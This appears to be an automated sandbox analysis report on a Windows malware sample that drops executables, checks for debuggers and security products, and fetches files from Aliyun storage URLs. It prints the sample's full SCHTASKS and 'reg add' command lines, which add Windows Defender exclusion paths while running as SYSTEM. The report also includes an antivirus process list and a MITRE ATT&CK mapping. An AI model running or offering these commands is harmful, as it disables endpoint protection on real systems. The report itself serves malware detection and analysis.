Code function: 6_2_00603EE5 rdtsc

6_2_00603EE5

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Window / User API: threadDelayed 599			Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Window / User API: threadDelayed 400			Jump to behavior

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Dropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sys			Jump to dropped file
Source: C:\Users\user\Documents\4mPVjj.exe	Dropped PE file which has not been started: C:\Program Files (x86)\9eAesx\FLgX3z.exe			Jump to dropped file

Source: C:\Users\user\Documents\4mPVjj.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_5-14029

Source: C:\Users\user\Documents\4mPVjj.exe

API coverage: 2.7 %

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe TID: 1812	Thread sleep count: 599 > 30	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe TID: 1812	Thread sleep time: -299500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe TID: 1812	Thread sleep count: 400 > 30	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe TID: 1812	Thread sleep time: -200000s >= -30000s	Jump to behavior

Source: C:\Users\user\Documents\4mPVjj.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 5_2_00007FFDAC12A1B8 FindFirstFileExW,

5_2_00007FFDAC12A1B8

Source: 4mPVjj.exe, 00000006.00000002.3376240582.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\C
Source: 4mPVjj.exe, 00000006.00000002.3376240582.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWTVG

Source: C:\Users\user\Documents\4mPVjj.exe	API call chain: ExitProcess graph end node			graph_5-14030
Source: C:\Users\user\Documents\4mPVjj.exe	API call chain: ExitProcess graph end node			graph_5-14373

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 6_2_00603EE5 rdtsc

6_2_00603EE5

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 5_2_00000001400073E0 LdrLoadDll,

5_2_00000001400073E0

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

5_2_0000000140007C91

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_000000014000F000

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 5_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,

5_2_0000000140004630

Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0000000140007C91
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00000001400106B0
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_00000001400092E0 SetUnhandledExceptionFilter,	5_2_00000001400092E0
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_00007FFDAC122630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FFDAC122630
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_00007FFDAC1276E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FFDAC1276E0
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_00007FFDAC121F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FFDAC121F50

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\4mPVjj.exe	NtAllocateVirtualMemory: Indirect: 0x140006FD0	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	NtDelayExecution: Indirect: 0x1D94D4	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	NtProtectVirtualMemory: Indirect: 0x2A2B253	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	NtProtectVirtualMemory: Indirect: 0x2A7B253	Jump to behavior

Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior

Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 5_2_00007FFDAC12FD40 cpuid

5_2_00007FFDAC12FD40

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: GetLocaleInfoA,

5_2_000000014000F370

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 5_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

5_2_000000014000A370

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 5_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

5_2_0000000140005A70

Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Safe.exe
Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avgwdsvc.exe
Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: AYAgent.aye
Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: 4mPVjj.exe, 4mPVjj.exe, 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,		5_2_00000001400042B0
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,		5_2_0000000140003F80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	112 Command and Scripting Interpreter	24 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	123 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Service Execution	Login Hook	24 Windows Service	1 DLL Side-Loading	NTDS	141 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Process Injection	32 Masquerading	LSA Secrets	1 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	1 Modify Registry	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
13478674376-78423498.01.exe	12%	Virustotal		Browse
13478674376-78423498.01.exe	8%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\9eAesx\FLgX3z.exe	0%	ReversingLabs
C:\Users\user\Documents\4mPVjj.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgww	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/&	0%	Avira URL Cloud	safe
https://psychhub.com/COVID-19/COVID-19-individuals/)	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg0u	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/s.jpg	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/a.gifs.com	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/2	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/i.dat	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1003	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg_tN	0%	Avira URL Cloud	safe
https://ehs.yale.edu/sites/default/files/files/covid-19-cleaning-computers-electronics.pdf)	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/d.gif	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gif	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgca	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1003-Z	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datpData	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/a.gifhttps://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gifht	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat6	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gifU	0%	Avira URL Cloud	safe
http://www.mindful.org/)	0%	Avira URL Cloud	safe
https://emergency.cdc.gov/coping/selfcare.asp)	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gifJ	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/17-2476756634-1003	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/s.dat	0%	Avira URL Cloud	safe
http://www.suicidepreventionlifeline.org/GetHelp/LifelineChat.aspx)	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgl	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gif5	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gifA	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gif;	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgLj	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gif)	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datM	0%	Avira URL Cloud	safe
https://wwwn.cdc.gov/dcs/ContactUs/Form)	0%	Avira URL Cloud	safe
https://hdsuer.oss-cn-shanghai.aliyuncs.com/a.gif	0%	Avira URL Cloud	safe
http://www.oisd.gov.in/)	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/ft	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	118.178.60.9	true	false	high
sc-2jmu.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.com	47.101.28.195	true	false	unknown
hdsuer.oss-cn-shanghai.aliyuncs.com	unknown	unknown	false	unknown
22mm.oss-cn-hangzhou.aliyuncs.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://hdsuer.oss-cn-shanghai.aliyuncs.com/s.jpg	false	Avira URL Cloud: safe	unknown
https://hdsuer.oss-cn-shanghai.aliyuncs.com/i.dat	false	Avira URL Cloud: safe	unknown
https://hdsuer.oss-cn-shanghai.aliyuncs.com/d.gif	false	Avira URL Cloud: safe	unknown
https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gif	false	Avira URL Cloud: safe	unknown
https://hdsuer.oss-cn-shanghai.aliyuncs.com/s.dat	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	false		high
https://hdsuer.oss-cn-shanghai.aliyuncs.com/a.gif	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://22mm.oss-cn-hangzhou.aliyuncs.com/&	4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	4mPVjj.exe, 00000006.00000002.3375987513.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000146000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000141000.00000004.00000010.00020000.00000000.sdmp	false		high
https://www.cdc.gov/coronavirus/2019-ncov/hcp/disposition-in-home-patients.html)	13478674376-78423498.01.exe	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg0u	4mPVjj.exe, 00000006.00000002.3377868720.0000000003CC0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgww	4mPVjj.exe, 00000006.00000003.3318945426.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.nami.org/Home)	13478674376-78423498.01.exe	false		high
https://www.who.int/mental_health/evidence/burn-out/en/)	13478674376-78423498.01.exe	false		high
http://www.youtube.com/watch?v=1r2C1zGUHbU)	13478674376-78423498.01.exe	false		high
https://www.cdc.gov/coronavirus/2019-ncov/if-you-are-sick/care-for-someone.html)	13478674376-78423498.01.exe	false		high
https://www.epa.gov/pesticide-registration/list-n-disinfectants-use-against-sars-cov-2)	13478674376-78423498.01.exe	false		high
https://www.cdc.gov/coronavirus/2019-ncov/daily-life-coping/share-facts.html)	13478674376-78423498.01.exe	false		high
http://www.cdc.gov/healthywater/hygiene/etiquette/coughing_sneezing.html)	13478674376-78423498.01.exe	false		high
https://www.cdc.gov/coronavirus/2019-ncov/community/organizations/cleaning-disinfection.html)	13478674376-78423498.01.exe	false		high
https://psychhub.com/COVID-19/COVID-19-individuals/)	13478674376-78423498.01.exe	false	Avira URL Cloud: safe	unknown
